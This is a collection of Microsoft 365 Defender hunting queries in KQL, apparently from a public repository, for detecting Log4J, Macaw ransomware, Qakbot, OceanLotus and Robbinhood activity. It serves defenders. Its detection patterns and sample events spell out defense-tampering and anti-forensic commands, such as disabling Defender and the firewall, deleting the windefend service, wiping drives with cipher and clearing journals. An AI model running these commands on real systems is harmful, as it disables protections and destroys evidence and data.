| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md
================================================
# Suspicious process event creation from VMWare Horizon TomcatService
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
## Query
This query identifies anomalous child processes from the ws_TomcatService.exe process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where InitiatingProcessFileName has "ws_TomcatService.exe"
| where FileName != "repadmin.exe"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/MacOceanLotusBackdoor.txt
================================================
// Backdoor processes associated with OceanLotus Mac Malware Backdoor
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
//
// OS platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName in~ ("screenassistantd","spellagentd")
| top 100 by Timestamp
================================================
FILE: Campaigns/MacOceanLotusDropper.txt
================================================
// Backdoor processes associated with OceanLotus Mac malware backdoor dropper
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
// OS Platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where ProcessCommandLine contains "theme0"
| project Timestamp, DeviceId, DeviceName, AccountName, AccountSid, InitiatingProcessCommandLine, ProcessCommandLine
| top 100 by Timestamp
================================================
FILE: Campaigns/Macaw Ransomware/Disable Controlled Folders.md
================================================
# Macaw ransomware - Disable Controlled Folders
Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.
## Query
This query looks for instances where the attacker has disabled the use of controlled folders.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'cmd.exe'
| where FileName =~ 'powershell.exe' and ProcessCommandLine has('powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Imminent Ransomware.md
================================================
# Macaw ransomware - Imminent Ransomware
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
## Query
This query looks for instances where the attacker has run a collection of commands designed to tamper with security tools and system recovery tools.
```
DeviceProcessEvents
// Pivot on specific commands
| where ProcessCommandLine has_any("-ExclusionPath", "Set-MpPreference", "advfirewall", "-ExclusionExtension",
"-EnableControlledFolderAccess", "windefend", "onstart", "bcdedit", "Startup")
// Making list of found commands
| summarize ProcessCommandLine = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 6h)
// Extending columns for later aggregation, based on TTP
| extend StartUpExclusionPath = iff(ProcessCommandLine has_all("-ExclusionPath", "Startup"), 1, 0)
| extend DefenderTamp = iff(ProcessCommandLine has "Set-MpPreference"
and ProcessCommandLine has_any(
"-SevereThreatDefaultAction 6",
"-HighThreatDefaultAction 6",
"-ModerateThreatDefaultAction 6",
"-LowThreatDefaultAction 6",
"-ScanScheduleDay 8"), 1, 0)
| extend NetshFirewallTampering = iff(ProcessCommandLine has_all( "netsh", "advfirewall", "allprofiles state off"), 1, 0)
| extend BatExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".bat"), 1, 0)
| extend ExeExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".exe"), 1, 0)
| extend DisableControlledFolderAccess = iff(ProcessCommandLine has_all("-EnableControlledFolderAccess", "Disabled"), 1, 0)
| extend ScDeleteDefend = iff(ProcessCommandLine has_all("sc", "delete", "windefend"), 1, 0)
| extend BootTampering = iff(ProcessCommandLine has_all("bcdedit", "default") and ProcessCommandLine has_any ("recoveryenabled No", "bootstatuspolicy ignoreallfailures"), 1, 0)
| extend SchTasks = iff(ProcessCommandLine has_all("/sc", "onstart", "system", "/create", "/delay"), 1, 0)
// Summarizing found commands
| summarize by NetshFirewallTampering ,BatExclusion, ExeExclusion, DisableControlledFolderAccess, ScDeleteDefend, SchTasks, BootTampering, DefenderTamp, StartUpExclusionPath, DeviceId, Timestamp
// Adding up each piece of evidence
| extend EvidenceCount = NetshFirewallTampering + BatExclusion + ExeExclusion + DisableControlledFolderAccess + ScDeleteDefend + SchTasks + BootTampering + DefenderTamp + StartUpExclusionPath
| where EvidenceCount > 4
```
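The evidence-scoring logic of this query, as an added Python illustration that is not one of the repository's own queries: pivoted command lines are grouped per device into 6-hour windows, the same nine indicators are evaluated over the whole set of commands in the window, and only windows whose evidence count exceeds 4 are kept. KQL's `has` is approximated here by a case-insensitive search bounded by non-alphanumeric characters, and the events are constructed samples; both are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

BIN = timedelta(hours=6)
EPOCH = datetime(1970, 1, 1)


def has(text, term):
    """Approximate KQL `has`: case-insensitive search for `term` bounded by non-alphanumerics.
    Assumption: KQL's term indexing differs in detail; this stands in for it for illustration."""
    pattern = r"(?<![A-Za-z0-9])" + re.escape(term) + r"(?![A-Za-z0-9])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def has_all(text, *terms):
    return all(has(text, t) for t in terms)


def has_any(text, *terms):
    return any(has(text, t) for t in terms)


# The pivot terms from the first `where`, and one check per `extend` in the query.
PIVOT_TERMS = ("-ExclusionPath", "Set-MpPreference", "advfirewall", "-ExclusionExtension",
               "-EnableControlledFolderAccess", "windefend", "onstart", "bcdedit", "Startup")
INDICATORS = {
    "StartUpExclusionPath": lambda t: has_all(t, "-ExclusionPath", "Startup"),
    "DefenderTamp": lambda t: has(t, "Set-MpPreference") and has_any(
        t, "-SevereThreatDefaultAction 6", "-HighThreatDefaultAction 6",
        "-ModerateThreatDefaultAction 6", "-LowThreatDefaultAction 6", "-ScanScheduleDay 8"),
    "NetshFirewallTampering": lambda t: has_all(t, "netsh", "advfirewall", "allprofiles state off"),
    "BatExclusion": lambda t: has_all(t, "-ExclusionExtension", ".bat"),
    "ExeExclusion": lambda t: has_all(t, "-ExclusionExtension", ".exe"),
    "DisableControlledFolderAccess": lambda t: has_all(t, "-EnableControlledFolderAccess", "Disabled"),
    "ScDeleteDefend": lambda t: has_all(t, "sc", "delete", "windefend"),
    "BootTampering": lambda t: has_all(t, "bcdedit", "default") and has_any(
        t, "recoveryenabled No", "bootstatuspolicy ignoreallfailures"),
    "SchTasks": lambda t: has_all(t, "/sc", "onstart", "system", "/create", "/delay"),
}


def bin_start(ts):
    """bin(Timestamp, 6h): start of the 6-hour window containing ts."""
    return EPOCH + ((ts - EPOCH) // BIN) * BIN


def score_events(events, threshold=4):
    """Group pivoted command lines per device and window, flag each TTP, and keep the
    windows whose evidence count exceeds `threshold` (the query's `EvidenceCount > 4`)."""
    windows = defaultdict(set)            # make_set(ProcessCommandLine) by DeviceId, bin
    for ev in events:
        if has_any(ev["ProcessCommandLine"], *PIVOT_TERMS):
            windows[(ev["DeviceId"], bin_start(ev["Timestamp"]))].add(ev["ProcessCommandLine"])
    results = []
    for (device, start), cmds in sorted(windows.items()):
        text = "\n".join(sorted(cmds))    # the checks run over the whole set, as in the query
        flags = {name: int(check(text)) for name, check in INDICATORS.items()}
        count = sum(flags.values())
        if count > threshold:
            results.append({"DeviceId": device, "WindowStart": start.isoformat(),
                            "EvidenceCount": count, "Flags": flags})
    return results


# Constructed sample events (not real telemetry): one device runs six tampering commands
# inside a single window, a stray command lands in a later window, and a second device
# runs a single command that touches only one indicator.
def _ev(device, hour, minute, cmd):
    return {"DeviceId": device, "Timestamp": datetime(2021, 10, 15, hour, minute),
            "ProcessCommandLine": cmd}


EVENTS = [
    _ev("dev-1", 2, 10, r'powershell -command "Add-MpPreference -ExclusionPath C:\Users\Public\Startup"'),
    _ev("dev-1", 2, 12, r'powershell -command "Set-MpPreference -SevereThreatDefaultAction 6 -HighThreatDefaultAction 6"'),
    _ev("dev-1", 2, 15, r'netsh advfirewall set allprofiles state off'),
    _ev("dev-1", 2, 20, r'powershell -command "Add-MpPreference -ExclusionExtension .bat"'),
    _ev("dev-1", 2, 25, r'powershell -command "Set-MpPreference -EnableControlledFolderAccess Disabled"'),
    _ev("dev-1", 2, 40, r'bcdedit /set {default} recoveryenabled No'),
    _ev("dev-1", 13, 0, r'netsh advfirewall set allprofiles state off'),
    _ev("dev-2", 3, 0, r'powershell -command "Set-MpPreference -ScanScheduleDay 8"'),
]

if __name__ == "__main__":
    for row in score_events(EVENTS):
        print(row)
```

Because the indicators are evaluated over the joined set of commands in a window rather than per command, a `Set-MpPreference` call in one command and a threat-action flag in another still count as one `DefenderTamp` hit; the same is true in the query, since `make_set` runs before the `extend` steps.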
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md
================================================
# Macaw ransomware - Inhibit recovery by disabling tools and functionality
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
## Query
This query looks for instances where the attacker has disabled various tools including Task Manager, CMD, and Registry Tools.
```
DeviceProcessEvents
| where ProcessCommandLine has_all ("reg", "add")
| where ProcessCommandLine has_any("DisableTaskMgr", "DisableCMD", "DisableRegistryTools", "NoRun") and ProcessCommandLine has "REG_DWORD /d \"1\""
| summarize ProcessCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 3m)
| where ProcessCount > 2
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Mass account password change.md
================================================
# Macaw ransomware - Mass account password change
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impede recovery efforts.
## Query
This query looks for instances of attackers changing hundreds of account passwords in short succession.
```
DeviceProcessEvents
| where ProcessCommandLine has_all('user', '/Domain', '/Active:Yes', '/PasswordChg:No')
| summarize commands=count() by DeviceId, bin(Timestamp, 1d)
| where commands > 200
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/PSExec Attrib commands.md
================================================
# Macaw ransomware - PSExec Attrib commands
Prior to deploying Macaw ransomware in an organization, adversaries will use Attrib to display file attribute information on multiple drives and all subfolders.
## Query
This query looks for PSExec utilizing a .bat file to run the attrib command with parameters observed in Macaw incidents.
```
DeviceProcessEvents
| where InitiatingProcessParentFileName endswith "PSEXESVC.exe"
| where InitiatingProcessCommandLine has ".bat"
| where FileName =~ "cmd.exe" and ProcessCommandLine has_all("-s", "-h", "-r", "-a", "*.*")
| take 100
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md
================================================
# Macaw Ransomware - Use of MSBuild.exe as a LOLBin
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
## Query
This query looks for instances of MSBuild.exe being used as a LOLBin.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName =~ "msbuild.exe" and ProcessCommandLine has "programdata"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/OceanLotus registry activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml
// Questions via Twitter: @janvonkirchheim
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType == "RegistryValueSet"
| where RegistryKey endswith @"\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model"
or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon"
or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon"
or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon"
================================================
FILE: Campaigns/Qakbot/Excel launching anomalous processes.md
================================================
# Excel launching anomalous processes
## Query
Use this query to find Excel launching anomalous processes consistent with Qakbot payloads, which carry additional markers from recent Qakbot executions. The presence of such anomalous processes indicates that the payload was delivered and executed, though reconnaissance and successful implantation haven’t been completed yet.
```
DeviceProcessEvents
| where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe"
| where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe")
| where FileName in~ ("regsvr32.exe", "rundll32.exe")
| where ProcessCommandLine has @"..\"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/General attempts to access local email store.md
================================================
# General attempts to access local email store
## Query
Use this query to find attempts to access files in the local path containing Outlook emails.
```
DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName,
InitiatingProcessCommandLine, DeviceId, Timestamp
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot Craigslist Domains.md
================================================
# Qakbot Craigslist Domains
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to manually type into the address bar to access.
## Query
This query looks for network connections to domains impersonating Craigslist which are associated with the delivery of Qakbot.
```
DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot email theft.md
================================================
# Qakbot email theft
## Query
Use this query to find email-stealing activity run by Qakbot, which uses “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Stolen email may be exfiltrated to the operators, and its theft indicates that the malware completed a large portion of its automated activity without interruption.
Generic:
```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
| where FileName endswith '.eml'
```
Specific:
```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe' and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1'
and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe') and FolderPath endswith ".eml"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot reconnaissance activities.md
================================================
# Qakbot reconnaissance activities
## Query
Use this query to find reconnaissance and beaconing activities after code injection occurs. The reconnaissance commands are consistent with the current version of Qakbot and run automatically to exfiltrate system information. Once exfiltrated, this data is used to prioritize human-operated actions.
```
DeviceProcessEvents
| where InitiatingProcessFileName == InitiatingProcessCommandLine
| where ProcessCommandLine has_any (
"whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10",
"net share","route print","netstat -nao","net localgroup")
| summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId,bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_FileName >= 8
```
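The same grouping and threshold logic, re-implemented in Python as an added example (not one of the repository's queries) and run over constructed process events, to show why the bare-command-line filter and the distinct-image count matter. It assumes DeviceProcessEvents-style field names and approximates KQL `has_any` with a case-insensitive substring test.

```python
# Added example: Python re-implementation of the Qakbot reconnaissance query
# above, run over constructed DeviceProcessEvents-style rows (not real telemetry).
# KQL `has_any` is term-based; it is approximated here with a case-insensitive
# substring test, which is slightly looser than the original.
from collections import defaultdict
from datetime import datetime, timedelta

RECON_MARKERS = (
    "whoami /all", "cmd /c set", "arp -a", "ipconfig /all", "net view /all",
    "nslookup -querytype=ALL -timeout=10", "net share", "route print",
    "netstat -nao", "net localgroup",
)
THRESHOLD = 8  # dcount_FileName >= 8 in the original query


def has_any(command_line, markers=RECON_MARKERS):
    """Approximation of KQL `has_any`: case-insensitive substring match."""
    lowered = command_line.lower()
    return any(marker.lower() in lowered for marker in markers)


def find_recon_bursts(events, threshold=THRESHOLD):
    """Group matching events by device, day and initiating process (the KQL
    `summarize ... by` clause) and keep groups that launched at least
    `threshold` distinct child images. Returns {group_key: sorted command lines}."""
    groups = defaultdict(lambda: {"images": set(), "cmds": set()})
    for ev in events:
        # The injected host process is launched with a bare image name and no
        # arguments, so its file name equals its command line.
        if ev["InitiatingProcessFileName"] != ev["InitiatingProcessCommandLine"]:
            continue
        if not has_any(ev["ProcessCommandLine"]):
            continue
        day = ev["Timestamp"].date()  # bin(Timestamp, 1d)
        key = (ev["DeviceId"], day,
               ev["InitiatingProcessFileName"], ev["InitiatingProcessCommandLine"])
        groups[key]["images"].add(ev["FileName"].lower())   # dcount(FileName)
        groups[key]["cmds"].add(ev["ProcessCommandLine"])   # make_set(ProcessCommandLine)
    return {k: sorted(v["cmds"]) for k, v in groups.items()
            if len(v["images"]) >= threshold}


# (child image, command line) pairs for each marker; three of the ten markers
# run through net.exe, so the full set yields exactly 8 distinct images.
RECON_COMMANDS = [
    ("whoami.exe", "whoami /all"), ("cmd.exe", "cmd /c set"), ("arp.exe", "arp -a"),
    ("ipconfig.exe", "ipconfig /all"), ("net.exe", "net view /all"),
    ("nslookup.exe", "nslookup -querytype=ALL -timeout=10"), ("net.exe", "net share"),
    ("route.exe", "route print"), ("netstat.exe", "netstat -nao"),
    ("net.exe", "net localgroup"),
]


def _event(device, ts, parent_file, parent_cmd, image, cmd):
    return {"DeviceId": device, "Timestamp": ts,
            "InitiatingProcessFileName": parent_file,
            "InitiatingProcessCommandLine": parent_cmd,
            "FileName": image, "ProcessCommandLine": cmd}


def build_sample_events():
    """Constructed sample telemetry (hypothetical device ids and timestamps)."""
    t0 = datetime(2021, 9, 1, 10, 0, 0)
    events = []
    # dev-a: injected mobsync.exe (bare command line) runs the whole recon set.
    for i, (image, cmd) in enumerate(RECON_COMMANDS):
        events.append(_event("dev-a", t0 + timedelta(seconds=i),
                             "mobsync.exe", "mobsync.exe", image, cmd))
    # dev-b: an interactive shell runs three of the same commands; under threshold.
    for i, (image, cmd) in enumerate(RECON_COMMANDS[:3]):
        events.append(_event("dev-b", t0 + timedelta(seconds=i),
                             "cmd.exe", "cmd.exe", image, cmd))
    # dev-c: full recon set, but the parent carries arguments, so the
    # FileName == CommandLine filter drops every row.
    for i, (image, cmd) in enumerate(RECON_COMMANDS):
        events.append(_event("dev-c", t0 + timedelta(seconds=i),
                             "cmd.exe", "cmd.exe /c setup.bat", image, cmd))
    return events


if __name__ == "__main__":
    for key, cmds in find_recon_bursts(build_sample_events()).items():
        print(key[0], key[1], key[2], len(cmds), "recon commands")
```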
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt
================================================
// Find use of Alternate Data Streams (ADS) for anti-forensic purposes.
// Alternate Data Streams execution
DeviceProcessEvents
| where Timestamp > ago(7d)
// Command lines used
| where ProcessCommandLine startswith "-q -s" and ProcessCommandLine has "-p"
// Removing IDE processes
and not(FolderPath has_any("visual studio", "ide"))
| summarize make_set(ProcessCommandLine), make_set(FolderPath),
make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h)
================================================
FILE: Campaigns/Ransomware hits healthcare - Backup deletion.txt
================================================
// List alerts flagging attempts to delete backup files
AlertInfo
| where Timestamp > ago(7d)
| where Title == "File backups were deleted"
| join AlertEvidence on AlertId
================================================
FILE: Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt
================================================
// Look for cipher.exe deleting data from multiple drives.
// This is often performed as an anti-forensic measure prior to encryption.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "cipher.exe"
// Looking for /w flag for deleting
| where ProcessCommandLine has "/w"
| summarize CommandCount = dcount(ProcessCommandLine),
make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
// Looking for multiple drives in a short timeframe
| where CommandCount > 1
================================================
FILE: Campaigns/Ransomware hits healthcare - Clearing of system logs.txt
================================================
// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "fsutil.exe"
and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal"
================================================
FILE: Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt
================================================
// Identify accounts that have logged on to affected endpoints
// Check for specific alerts
AlertInfo
| where Timestamp > ago(7d)
// Attempts to clear security event logs.
| where Title in("Event log was cleared",
// List alerts flagging attempts to delete backup files.
"File backups were deleted",
// Potential Cobalt Strike activity - Note that other threat activity can also
// trigger alerts for suspicious decoded content
"Suspicious decoded content",
// Cobalt Strike activity
"'Atosev' malware was detected",
"'Ploty' malware was detected",
"'Bynoco' malware was detected")
| extend AlertTime = Timestamp
| join AlertEvidence on AlertId
| distinct DeviceName, AlertTime, AlertId, Title
| join DeviceLogonEvents on DeviceName
// Creating 10 day Window surrounding alert activity
| where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d
// Projecting specific columns
| project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain,
AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName
================================================
FILE: Campaigns/Ransomware hits healthcare - Robbinhood activity.txt
================================================
// Find distinct evasion and execution activities
// associated with the Robbinhood ransomware campaign.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "winlogon.exe"
| where FileName == "cmd.exe" and ProcessCommandLine has_any("taskkill", "net",
"robbin", "vssadmin", "bcdedit", "wevtutil")
================================================
FILE: Campaigns/Ransomware hits healthcare - Turning off System Restore.txt
================================================
// Find attempts to stop System Restore and
// prevent the system from creating restore points
DeviceProcessEvents
| where Timestamp > ago(7d)
// Pivoting for rundll32
and InitiatingProcessFileName =~ 'rundll32.exe'
// Looking for a non-empty initiating command line
and isnotempty(InitiatingProcessCommandLine)
// Looking for schtasks.exe as the created process
and FileName in~ ('schtasks.exe')
// Disabling system restore
and ProcessCommandLine has 'Change' and ProcessCommandLine has 'SystemRestore'
and ProcessCommandLine has 'disable'
================================================
FILE: Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
================================================
// Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools
DeviceFileEvents
| where Timestamp > ago(7d)
// The listed hashes are 64 hex characters (SHA-256), so match on the SHA256 column
| where SHA256 in('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8',
'31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427')
================================================
FILE: Campaigns/StrRAT malware/StrRAT-AV-Discovery.md
================================================
# StrRAT Malware AV Discovery
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the infected machine based on C2 server commands. Additionally, this threat has a ransomware encryption/decryption module which appends the .crimson extension.
## Query
